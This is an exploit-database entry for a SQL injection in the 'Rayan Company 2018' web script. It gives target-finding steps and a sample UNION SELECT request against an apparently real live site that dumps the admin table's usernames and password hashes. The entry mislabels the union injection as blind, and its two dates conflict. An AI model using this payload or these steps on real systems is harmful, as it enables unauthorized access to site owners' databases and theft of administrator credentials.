Rayan Company 2018 - 'id' Blind SQL Injection

2020.09.24

Credit: HnT403

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: Rayan Company 2018 - 'id' Blind SQL Injection
# Date: 2020-11-9
# Exploit Author: HnT403 (hnt403@gmail.com)
# Vendor Homepage: https://rayancompany.com
# Version : 1.0
# Tested on: Windows 10/Kali Linux
# CVE: N/A

# Description
The Vulnerability effects http://YOUR-TARGET.com/main.php .
Parameter: id
Access to admin username and password(hash)

#POC
step 1 - Find Your Target (Programmed using Rayan Company Script)
step 2 - add '/main/page.php?id=1' to target URL
step 3 - Inject Your Playload in 'id' parameter

#Sample Request
http://eapec2018.ir/main/en/page.php?id=-1%27+UNION+ALL+SELECT+1,2,3,group_concat(user,0x3a,pass,0x3c62723e29),5%20from%20rxd_admin%20--%20-

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Rayan Company 2018 - 'id' Blind SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.